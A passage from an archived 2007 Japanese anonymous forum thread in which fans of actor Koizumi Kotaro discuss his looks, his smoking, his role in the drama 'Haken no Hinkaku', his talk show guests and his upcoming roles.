   スタイルいいから、テレビで見るよりもだいぶカッコいいですよ、この人
小泉→天まで届きそうなさわやかオーラw ザ・美青年☆
   やっぱりプロの俳優はそこいらのイケメンもどきとは格が違うわ、と実感

女優陣見れなかった・・orz

154 :通行人さん@無名タレント:2007/02/17(土) 09:07:09 ID:0tVNu8Zp0
大泉さんはテレビでみててもスタイル良いなあと思う。
妹が無駄にスタイルがいいと笑ってたw

>小泉→天まで届きそうなさわやかオーラw ザ・美青年☆
   やっぱりプロの俳優はそこいらのイケメンもどきとは格が違うわ、と実感
生孝太郎に会いたい。実際見た人によるととにかく肌が白くてきれいでカワイイ
綺麗らしい。彼氏と同じ男とは思えなかったってw


155 :通行人さん@無名タレント:2007/02/17(土) 17:08:24 ID:1jZvc3cM0
タバコはイメージじゃないな。できれば身体のためにもやめてほしいけど、一度
吸い始めるとなかなかやめられないみたいだね。やめることがストレスになった
らますます身体に悪いし。

156 :通行人さん@無名タレント:2007/02/17(土) 17:19:30 ID:zkJAsXwW0
ここのスレに初めてきました。
こんなに小泉さんが人気があるとは知らなかった。

157 :通行人さん@無名タレント:2007/02/17(土) 17:22:30 ID:1jZvc3cM0
今ハケンの品格が高視聴率だからね。やっぱりドラマは視聴率取れなければ
ダメだよ。

158 :通行人さん@無名タレント:2007/02/17(土) 18:38:05 ID:aBxgK6UiO
>>153
タバコは吸わずにいられないというよりは雰囲気で吸ってしまうのねw
確かに業界での喫煙率も高そうだし酒の席でも喫煙率って高いよね。
周りにも普段吸わなくても酒の席では吸ってしまう人いるわ。
止めるのがストレスになるくらいのヘビースモーカーになる前にやめられるなら止めた方が体には良さそう。
お酒はやめられそうにないしねw
それにしても孝太郎はやっぱり爽やかオーラ全開なんだなぁ。

159 :通行人さん@無名タレント:2007/02/17(土) 22:05:10 ID:vT+bXj3p0
>>153
またまたありがとうございます!
「The孝太郎」では昔のVを観るというのがあるからどうしても室内限定になってますよね。
室内でもお酒を飲んだりしてないし。外に出て動きがある方が孝太郎も楽しめそうな感じだけど。
孝太郎はタバコ歴長いみたいだけどドラマでは吸っていない・・よね?「ハケン〜」での東海林さんと
タバコを吸っているシーンでも賢ちゃんは吸っていないように見えるのは私の注意力不足?
爽やかオーラ全開の孝太郎・・実際に会ったりしたらあまりに眩しすぎて倒れてしまいそうな自分w

160 :通行人さん@無名タレント:2007/02/17(土) 22:10:10 ID:vT+bXj3p0
間違えて途中で送ってしまったので連投でごめんなさい!

>>157
ドラマ好きとしては必ずしも高視聴率ドラマ=面白いドラマとは限らないと思ってはいるのだけど
「ハケン〜」については視聴率も視聴者の満足度ランキングも高いみたいで嬉しい限りですよね。
高視聴率でなくても良作と言える作品に出てもらいたいと思う反面、役者としての孝太郎を
世間に認知、評価してもらうにはやっぱり高視聴率ドラマに出る事も大事なのかなと。
出演者やスタッフにも恵まれているみたいだし、いろんな意味で「ハケン〜」出演は良かったなと。

161 :通行人さん@無名タレント:2007/02/17(土) 22:12:02 ID:0tVNu8Zp0
賢ちゃんは煙草吸ってないね。
突然賢ちゃんがブハーッと煙草ふかしたら
ハケン視聴者はびっくり仰天w
賢ちゃんのイメージぶっ壊すにはいいかもしれない。

162 :通行人さん@無名タレント:2007/02/17(土) 22:23:25 ID:wpqtsfgu0
>>159
孝太郎ラボやプラスでもゲストが吸っていても孝太郎が吸ってるのは
一度も見たことがなかった。
だんだん本数が減ってきてるって言ってたので、無理せず自然に
気付いたら吸わなくなっていた・・・ってことになるんじゃないかな。

163 :通行人さん@無名タレント:2007/02/18(日) 06:15:00 ID:zHk1ytr60
>>161-162
ありがとう。私の思い込み、注意力不足というわけではなくて孝太郎は自分がホストをしている
番組内はもちろんドラマの中でも吸ってないよね? もしかしたら初喫煙シーンがあるのではと
思っていた「波の塔」の小野木の時も喫煙シーンはなかったし。やっぱりイメージじゃないのかしら?w
吸うのだと聞いてはいても実際に喫煙している姿を見たら自分もけっこうビックリするかもしれないw

164 :通行人さん@無名タレント:2007/02/18(日) 17:21:54 ID:/EqicodV0
やっぱりイメージを壊してはいけない、というのがあるのかもしれないね。里中役
は清潔感ある好青年の役だから、タバコ吸っていたら違和感あるかも。


165 :通行人さん@無名タレント:2007/02/18(日) 17:59:06 ID:Co6orkQU0
煙草を吸ってる孝太郎をちょっとみたい気もする。
あの長い指で・・・色っぽいんじゃない?

166 :通行人さん@無名タレント:2007/02/18(日) 18:27:31 ID:UseJ8UwS0
くわえタバコでバイクを直したりとか(つなぎ作業着で)

167 :通行人さん@無名タレント:2007/02/18(日) 21:01:42 ID:e2K8jn0TO
今度演じる役柄によっては吸ってる姿を見る機会があるかもね。
孝太郎は手がとてもキレイだからタバコを吸ってる姿も含めて何をやっても様になりそう。


168 :通行人さん@無名タレント:2007/02/19(月) 17:25:52 ID:zfU5LTZj0
残念ながら今は視聴率が全て。マスコミは孝太郎のことを快く思っていないから、
数字という結果を出さなくてはなかなか評価してくれない。実際に今回、高視聴率
ドラマに出るようになってから、「孝太郎は消える」という人がほとんどいなくなっ
てきたような気がする。そりゃ、これだけ人気のドラマに出てるのに、消えるなんて
言ってたら周りにバカにされるだけ。


169 :通行人さん@無名タレント:2007/02/19(月) 21:18:28 ID:edI4n3fLO
確かに一時期あまりTVで見かけない事もあったけど一昨年後半くらいからは露出も多くなった気がする。
パパが退任してからの方がさらに露出が増えると思っていたけど実際にその通りになってる。
去年はドラマに出てなかった秋もバラエティに出まくりだったし。今年はさらに追い風が吹くと思う。
高視聴率ドラマに出てくれるのはもちろん嬉しいけど見応えのあるドラマに出てくれる方がもっと嬉しい。

170 :通行人さん@無名タレント:2007/02/19(月) 22:31:10 ID:OH34iABa0
孝太郎って本当に手がきれいだよね。仕草が上品で同時にセクシーな感じw
何をやってもさまになるというのはその通りと思うw

最近は以前ほどには観なくなってはいるのだけど子供の頃からのドラマ好きなので個人的には
視聴率が全てというのは寂しい感じもしてしまうんだけどね。
少数派かもしれないけど視聴率が良くなくても話題になるドラマもある事はあるし。
でも高視聴率(話題の)ドラマに出るようになってマスコミの注目度が上がって演技面でも
評価されれば嬉しい事だよね。「ハケン〜」は視聴率も満足度ランキングも高くて嬉しいですw

171 :通行人さん@無名タレント:2007/02/19(月) 23:15:11 ID:edI4n3fLO
今週のThe孝太郎のゲストは誰?
先週に続いて中嶋さんで良いんだっけ?

172 :通行人さん@無名タレント:2007/02/19(月) 23:28:30 ID:OH34iABa0
>>171
今週の「The孝太郎」のゲストは中嶋朋子さんですよ。先週は孝太郎が中嶋さんの趣味に
興味津々という感じで意外とトーク盛り上がっていましたね。今週も盛り上がるかな?
来週のゲストは同じ事務所の木内晶子さん。珍しく来週は前後半の2回ではなく1回かも?
木内さんはプラスの時だったかにも1度出てるように思います。「The孝太郎」になってからは
孝太郎よりも年下のゲストは初めてですね。初対面でない年下の女の子がゲストとなると
またちょっと違う雰囲気になったりするのかな? 敬語が崩れたり・・はないかw

173 :通行人さん@無名タレント:2007/02/20(火) 00:07:39 ID:Ym8pu2nf0
>>172
木内晶子さんが以前出たときは二人とも最初は緊張気味だったけど
卓球と韓国料理と酒で意気投合して最終的には「あきちゃん」でしたw
当時、これからもっともっと知っていきたいとかいってたからなあ・・・


174 :通行人さん@無名タレント:2007/02/20(火) 00:11:36 ID:NnejhorIO
アウトドア派の孝太郎とは違ってインドア派の趣味の中嶋さんだけど孝太郎も興味深そうだったね。
次回のゲスト情報も合わせてサンクス!録画忘れないようにしなくちゃ!

175 :通行人さん@無名タレント:2007/02/20(火) 00:20:10 ID:5rM7OZ/b0
>>173
記憶が曖昧なのだけどあの時は辛い物対決!?とかやってたかな?と。。うろ覚えw
最後は「あきちゃん」になってたのも忘れてたw 孝太郎は共演した年下の人は
「○○ちゃん」で呼ぶみたいねw 最後は敬語も崩れてたかなぁ。
同じ事務所だしその後付き合いがあれば前回よりも親しくなっているだろうし。
今夜の放送もだけど来週がますます楽しみになって来たw ありがd!

176 :通行人さん@無名タレント:2007/02/20(火) 10:41:41 ID:mKhGzg5Y0
「The孝太郎」が見れないから残念。いつになったら全国ネットになるんだろう。
孝太郎がアウトドア派でフットサルやってることも、インターネットで知った
ぐらいだからね。もうそろそろ、全国ネットになっていいと思うんだけど。

177 :通行人さん@無名タレント:2007/02/20(火) 15:37:15 ID:8Ll4+3+Q0
>>176
禿同
こんなに孝太郎好きなのに見れないなんて…
ラジオも聴けないしドラマや全国区のバラエティでしか
孝太郎に会えない

178 :通行人さん@無名タレント:2007/02/20(火) 23:30:00 ID:5rM7OZ/b0
昨日の放送でも特に何がというわけではないけど中嶋朋子さんとのトーク、盛り上がってました。
中嶋さんは趣味・興味の範囲が広いので孝太郎も話を聞いていて興味深かったのかも。
私はラジオが聴きたいけど聴けないので孝太郎がホストの番組が観れない寂しさも少しはわかる。
ラジオはレポして下さる方がいてとても感謝しているのだけど1度自分の耳で孝太郎がどんな風に
ぶっちゃけトークをするのがすごく聴いてみたいw

179 :通行人さん@無名タレント:2007/02/21(水) 13:21:29 ID:wv+s+gvz0
ハケンも今日を入れて4回かあ。
4月期ドラマの確定まだかなあ。
なんか暇だなあ。

180 :通行人さん@無名タレント:2007/02/21(水) 16:49:33 ID:xCHjbHd40
ハケンってパート2もありそうな予感がする。脚本家の意向にもよるけど、人気
ドラマって「サラリーマン金太郎」みたいにシリーズ化されるよね。それか、ハ
ケン2時間SPっていうのもありそう。あくまでも、個人的予想だけどね。

181 :通行人さん@無名タレント:2007/02/21(水) 19:34:25 ID:wLseAsHhO
>>178
中嶋朋子さんが意外に話す人で驚いた。もっと話さない人かと思ってた。
孝太郎は意外とゲストの素顔を引き出すのがうまい、聞き上手と言ったらファンの欲目かなぁ。
新ドラマの正式発表ないよね。すごく待たされてる感じ。
ハケンは放送回数未定だと思ってたけど決まったのね。

182 :通行人さん@無名タレント:2007/02/21(水) 21:58:20 ID:wzGAYLpy0
私も「ハケン〜」の放送回数が決まった事を知らなかった。視聴率好調だから3月21日まで
放送して全11回分になると勝手に想像してたけど10回で終了なのね。某局製作の映画の
公開日の兼ね合いもあるのかな?終了が少し早い気がするので残念!最終回で大前さんは
会社を去ると思うからSPやパート2があったとしても職場とか面子は変わってしまうかな?
それとも大前さんが戻って来たという設定でやるとか?・・って勝手に妄想してみましたw
次のドラマの確定情報は来週までないのかな?共演が噂されている女優さんが来週、同じ局の
4話連続の単発ドラマの第1話に主演するから・・それまではそっちの宣伝の方になるかな?
さて、「ハケン〜」の時間だわ〜w

183 :通行人さん@無名タレント:2007/02/21(水) 23:34:57 ID:wv+s+gvz0
ドラマスレ賢ちゃん批判で溢れてるカワイソス

184 :通行人さん@無名タレント:2007/02/22(木) 00:01:26 ID:KRXpXHSo0
>>183
役としての里中批判はいつものことだから、仕方ないけど
役名じゃなく小泉での批判はちょっと、読むのが辛い (´・ω・`)

185 :通行人さん@無名タレント:2007/02/22(木) 20:36:11 ID:aembYoBYO
ドラマスレでの里中批判はいつもの事なのか…ほとんど行かないので知らなかった。
里中批判は仕方ない事もあるかもだけど小泉批判と聞くと切ない。
私もハケンの放送回数、思っていたよりも少ないと思った。もうあと3回だけ?
でも映画公開が近付けば某局の番宣にも出るだろうから仕方ないか。
ドラマの方も昨日は今までとイメージ違ったなぁ。最終回に向けて動き出した?

186 :通行人さん@無名タレント:2007/02/22(木) 22:10:01 ID:VZFVx08R0
私は昨夜の放送後から寝るまではドラマスレ読んでた。
でも今日仕事から帰ったら次スレもほぼ1スレ消費する勢いでとてもロムれなかったw
ドラマスレを読んでると感想って人それぞれなんだなと実感。自分としては昨日の放送は
全く面白いと思えなくてドラマスレでも同じような意見が溢れると勝手に思っていたら
面白かった、良かったという人も意外に多くて自分としてはギャップが面白かったw
でも昨日の放送での賢ちゃんへの批判がかなり多くて読んでいてもやっぱり寂しかった。
そこまで感じなかった自分はやっぱり孝太郎への贔屓目があるのかなぁ。先週は良かった!

187 :通行人さん@無名タレント:2007/02/22(木) 23:06:44 ID:wWCPhgVH0
ドラマスレは役者と役を同一視してしまって書くような人も多いから。
役の上でのことなのに批判されるのは孝太郎に限ってじゃなくハケンの役者みんなだしね。
里中批判の時、同一視されてしまうってのは、それだけ里中主任になりきってるってコトだから
役者小泉孝太郎としては人物が生きてなくって個性が全然出せてないとかよりいいんじゃないかと。

188 :名無しさん@懺悔いっぱい。:2007/02/23(金) 00:13:16 ID:TYxIw/RN0
自分も先日の里中の行動はイラついたけど、
それってやっぱ孝太郎が役者としてねらい通りに
演技できてるってことだよなと思い返してみる。

そんなことより孝太郎の姿をテレビでたくさん見られて嬉しいっつー
浅はかなファン心理の自分もいる。



189 :通行人さん@無名タレント:2007/02/23(金) 00:50:14 ID:C9OZAb6M0
浅はかじゃないよ。
出番が多いって嬉しいよね。
次期ドラマも出番が多くありますようにw

190 :通行人さん@無名タレント:2007/02/23(金) 01:05:31 ID:JPjLm4b60
>>188,189
出番が多いってことが、こんなに幸せだったとは・・・
昨年のガチバカとは天国と地獄ほどの差があります。
あとは、里中主任の米プラの企画が日の目を見ることを祈るのみです。

191 :通行人さん@無名タレント:2007/02/23(金) 07:40:15 ID:bNGRCpE10
確かに出番が多いのは嬉しい。
去年の1月期ドラマは最後まで観た事は観たけど・・だったし。
4月からのドラマも発表になったみたいだし(また主演の上司役?)
頑張って欲しいな!と。

192 :通行人さん@無名タレント:2007/02/23(金) 12:12:47 ID:C9OZAb6M0
ガチバカの総出演時間よりハケンの1話分の出演時間の方が多い気がする。

193 :通行人さん@無名タレント:2007/02/23(金) 15:58:13 ID:CHuGJ2ib0
役柄と本人とを同一視してしまう人って怖〜い。そこまで、のめりこんでドラマを
見たことがないからな。まぁ、そういう人はほんのごくごく一部の人たちなんだろ
うけどね。
ガチバカはあまりにつまらなくて1話で見るのをやめてしまった。視聴率もかなり
悪かったし。孝太郎ファンにとってはワースト1位のドラマはガチバカだね。

194 :通行人さん@無名タレント:2007/02/23(金) 21:09:31 ID:rxdPRN/YO
ファンになったのは早くないし孝太郎の出演ドラマを全て見てるわけではないので
ガチバカがワーストかどうかはわからないけど(ガチバカは一応見てた)あのドラマは
特に先生役の出演者は気の毒な感じがしたのは覚える。
新ドラマも発表になってるね。孝太郎は4番手くらい?出番少ないという事は無さそうかな?

77 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)